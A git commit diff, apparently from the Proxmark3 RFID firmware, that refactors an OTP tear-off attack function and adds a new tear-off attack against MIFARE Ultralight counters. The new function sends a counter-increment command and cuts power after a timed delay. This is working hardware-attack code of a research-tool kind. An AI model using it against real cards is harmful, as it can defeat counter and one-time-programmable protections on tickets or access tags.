WIP - hf mfu countertear ...

2025-08-14 02:27:26 -07:00 · 2020-10-12 19:08:29 +02:00 · 2020-10-12 19:08:29 +02:00 · 7cfbdcbae9
commit 7cfbdcbae9
parent acada02e37
5 changed files with 197 additions and 7 deletions
--- a/armsrc/mifarecmd.c
+++ b/armsrc/mifarecmd.c
@ -2695,9 +2695,8 @@ void Mifare_DES_Auth2(uint32_t arg0, uint8_t *datain) {
 //
 // Tear-off attack against MFU.
 // - Moebius et al
-void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {
+void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t tearoff_time, uint8_t *datain) {
    uint8_t blockNo = arg0;
-    uint32_t tearOffTime = arg1;
    uint8_t data_fullwrite[4] = {0x00};
    uint8_t data_testwrite[4] = {0x00};
    memcpy(data_fullwrite, datain, 4);
@ -2705,8 +2704,8 @@ void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {

    if (DBGLEVEL >= DBG_DEBUG) DbpString("Preparing OTP tear-off");

-    if (tearOffTime > 43000)
-        tearOffTime = 43000;
+    if (tearoff_time > 43000)
+        tearoff_time = 43000;

    MifareUWriteBlock(blockNo, 0, data_fullwrite);

@ -2732,9 +2731,50 @@ void MifareU_Otp_Tearoff(uint8_t arg0, uint32_t arg1, uint8_t *datain) {
    // Wait before cutting power.  aka tear-off
    LED_D_ON();

-    SpinDelayUsPrecision(tearOffTime);
+    SpinDelayUsPrecision(tearoff_time);
    if (DBGLEVEL >= DBG_DEBUG) Dbprintf(_YELLOW_("OTP tear-off triggered!"));
    switch_off();

    reply_ng(CMD_HF_MFU_OTP_TEAROFF, PM3_SUCCESS, NULL, 0);
 }
+
+//
+// Tear-off attack against MFU counter
+void MifareU_Counter_Tearoff(uint8_t counter, uint32_t tearoff_time) {
+
+    if (tearoff_time > 43000)
+        tearoff_time = 43000;
+
+    LEDsoff();
+    iso14443a_setup(FPGA_HF_ISO14443A_READER_LISTEN);
+    clear_trace();
+    set_tracing(true);
+
+    // Send MFU counter increase cmd
+    uint8_t cmd[] = {
+            MIFARE_ULEV1_INCR_CNT,
+            counter,
+            0,  // lsb
+            0,  
+            0,  // msb
+            0,  // rfu
+            0,
+            0,
+        };
+    AddCrc14A(cmd, sizeof(cmd) - 2);
+
+    // anticollision / select card
+    if (!iso14443a_select_card(NULL, NULL, NULL, true, 0, true)) {
+        if (DBGLEVEL >= DBG_ERROR) Dbprintf("Can't select card");
+        OnError(1);
+        return;
+    };
+
+    // send
+    ReaderTransmit(cmd, sizeof(cmd), NULL);
+    LED_D_ON();
+    SpinDelayUsPrecision(tearoff_time);
+    switch_off();
+
+    reply_ng(CMD_HF_MFU_COUNTER_TEAROFF, PM3_SUCCESS, NULL, 0);
+}